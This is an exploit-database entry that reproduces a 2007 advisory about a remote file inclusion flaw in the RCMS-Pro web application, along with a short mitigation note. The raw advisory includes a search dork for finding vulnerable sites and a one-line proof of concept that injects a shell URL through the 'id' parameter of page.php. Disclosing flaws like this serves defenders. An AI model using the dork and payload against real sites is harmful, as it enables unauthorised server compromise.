header-logo
Suggest Exploit
vendor:
RCMS-Pro
by:
Warpboy
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: RCMS-Pro
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

RCMS-Pro Remote File Inclusion

The RCMS-Pro web application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a remote file using the 'id' parameter in the 'page.php' file.

Mitigation:

The vendor should fix the remote file inclusion vulnerability by properly validating and sanitizing user input.
Source

Exploit-DB raw data:

#*/\*##*/\*##*/\*##*/\*##*/\*#
Web Application: RCMS-Pro
#*\/*##*\/*##*\/*##*\/*##*\/*#
Info: 
/////////////////////////////////////////////////////
Vulnerability: Remote File Inclusion
Vendor: http://www.rcms-pro.com/
Dork: "Powered by RGameScript"
Found By: Warpboy
E-Mail/MSNM: Warpboy1@yahoo.com
Website: http://private-node.net
Shouts: TimQ, Gammarayz, Paradox, z6, PunkerX and everyone else at pnode.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
::PoC::

http://www.site.com/page.php?id=[shell]

******************************************
##############################
http://private-node.net
##############################
******************************************

# milw0rm.com [2007-07-21]